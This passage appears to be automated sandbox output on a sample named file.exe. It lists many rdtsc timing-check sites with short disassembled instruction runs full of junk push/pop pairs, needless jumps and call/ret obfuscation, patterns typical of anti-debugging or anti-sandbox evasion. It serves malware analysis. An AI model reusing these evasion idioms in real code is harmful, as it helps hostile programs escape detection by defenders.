                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80B10 second address: E80B20 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80B20 second address: E80B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F3DE916F95Ch 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E80B38 second address: E80B62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F3DE9170BEDh 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F3DE9170BE6h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81F1B second address: E81F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E81F1F second address: E81F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F3DE9170BF5h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46F64 second address: E46F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3DE916F956h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E46F6E second address: E46F82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E860A4 second address: E860A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E860A8 second address: E860BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jne 00007F3DE9170BE6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E860BA second address: E860BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E860BE second address: E860DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3DE9170BF6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E866F6 second address: E86717 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F3DE916F95Ch 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F3DE916F95Bh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8687D second address: E86887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E869FF second address: E86A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86A05 second address: E86A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E86A09 second address: E86A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89315 second address: E8931B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8968D second address: E89696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89696 second address: E8969A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89762 second address: E89784 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3DE916F956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3DE916F966h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89899 second address: E8989E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89915 second address: E89919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89919 second address: E89931 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A23C second address: E8A241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A2FB second address: E8A312 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3DE9170BE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007F3DE9170BF0h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A3C5 second address: E8A3CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A3CB second address: E8A3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8A81F second address: E8A82E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3DE916F95Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B254 second address: E8B25A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B25A second address: E8B25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B25E second address: E8B262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B262 second address: E8B2C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov di, C5B2h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F3DE916F958h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b call 00007F3DE916F963h 0x00000030 jbe 00007F3DE916F95Ch 0x00000036 mov dword ptr [ebp+122D336Dh], edi 0x0000003c pop esi 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f push ebx 0x00000040 jo 00007F3DE916F956h 0x00000046 pop ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B2C5 second address: E8B2DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8B2DF second address: E8B2E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C362 second address: E8C3DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F3DE9170BF8h 0x0000000c popad 0x0000000d nop 0x0000000e mov esi, dword ptr [ebp+122D369Bh] 0x00000014 push 00000000h 0x00000016 or esi, 23246CEFh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007F3DE9170BE8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 mov dword ptr [ebp+1245CA5Fh], esi 0x0000003e jp 00007F3DE9170BEEh 0x00000044 xchg eax, ebx 0x00000045 jmp 00007F3DE9170BEAh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jl 00007F3DE9170BECh 0x00000053 jc 00007F3DE9170BE6h 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8C3DD second address: E8C3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8E44E second address: E8E4B7 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3DE9170BF5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F3DE9170BE8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D331Fh] 0x0000002f mov esi, dword ptr [ebp+122D330Ch] 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D2A3Ch], ecx 0x0000003d push eax 0x0000003e pushad 0x0000003f jmp 00007F3DE9170BF5h 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F9AD second address: E8F9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E8F6CB second address: E8F6E6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3DE9170BE8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F3DE9170BECh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E918EA second address: E918EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E918EE second address: E918F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98257 second address: E98272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F967h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E99294 second address: E9929B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E99324 second address: E99328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E972C8 second address: E972CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E972CC second address: E9738C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F3DE916F958h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F3DE916F95Bh 0x00000016 jmp 00007F3DE916F967h 0x0000001b popad 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F3DE916F958h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 call 00007F3DE916F968h 0x0000003c mov ebx, edi 0x0000003e pop ebx 0x0000003f push dword ptr fs:[00000000h] 0x00000046 jnl 00007F3DE916F95Bh 0x0000004c sbb di, 0E69h 0x00000051 mov dword ptr fs:[00000000h], esp 0x00000058 xor dword ptr [ebp+122D1A12h], ecx 0x0000005e mov eax, dword ptr [ebp+122D03F9h] 0x00000064 cld 0x00000065 push FFFFFFFFh 0x00000067 mov dword ptr [ebp+122D57AAh], eax 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 jmp 00007F3DE916F969h 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9843F second address: E98445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9B341 second address: E9B384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c cld 0x0000000d push 00000000h 0x0000000f jnc 00007F3DE916F964h 0x00000015 push 00000000h 0x00000017 call 00007F3DE916F95Dh 0x0000001c mov ebx, dword ptr [ebp+122D37DBh] 0x00000022 pop edi 0x00000023 push eax 0x00000024 push eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E98445 second address: E98449 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C35C second address: E9C362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C362 second address: E9C3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F3DE9170BF7h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F3DE9170BE8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F3DE9170BE8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000018h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov dword ptr [ebp+122D1F56h], esi 0x0000004b push eax 0x0000004c js 00007F3DE9170BF4h 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9C3D7 second address: E9C3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E994A8 second address: E994AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E995C3 second address: E995C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9E421 second address: E9E44B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3DE9170BF7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jng 00007F3DE9170BF0h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9E44B second address: E9E4AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edi, dword ptr [ebp+122D574Ch] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F3DE916F958h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 or ebx, 57B828E8h 0x0000002f push 00000000h 0x00000031 jmp 00007F3DE916F963h 0x00000036 mov bh, 22h 0x00000038 xchg eax, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F3DE916F95Dh 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9E4AC second address: E9E4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9E4B1 second address: E9E4B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9E4B7 second address: E9E4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F3DE9170BE6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F31D second address: E9F326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F326 second address: E9F32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F32A second address: E9F3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jp 00007F3DE916F95Eh 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D1A20h], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F3DE916F958h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D32F1h], edi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F3DE916F958h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 jmp 00007F3DE916F965h 0x00000058 push eax 0x00000059 pushad 0x0000005a push esi 0x0000005b ja 00007F3DE916F956h 0x00000061 pop esi 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F3B6 second address: E9F3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9A4AE second address: E9A4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F4D6 second address: E9F4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F3DE9170BE6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA347B second address: EA347F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA04C1 second address: EA04C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA42E2 second address: EA42FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007F3DE916F956h 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA42FB second address: EA42FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA261E second address: EA2622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA3643 second address: EA3649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EACDA1 second address: EACDB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EACDB3 second address: EACDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EACDB7 second address: EACDBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAC703 second address: EAC708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAC708 second address: EAC70D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2246 second address: EB2269 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2269 second address: EB226F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB226F second address: EB22AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F3DE9170BF2h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 jmp 00007F3DE9170BEBh 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push edi 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB236A second address: EB236E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB236E second address: EB2372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2372 second address: EB237B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2502 second address: EB2506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB2506 second address: EB250A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9241 second address: EB924A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB924A second address: EB9250 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6E7D0 second address: E6E7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB7EF8 second address: EB7EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
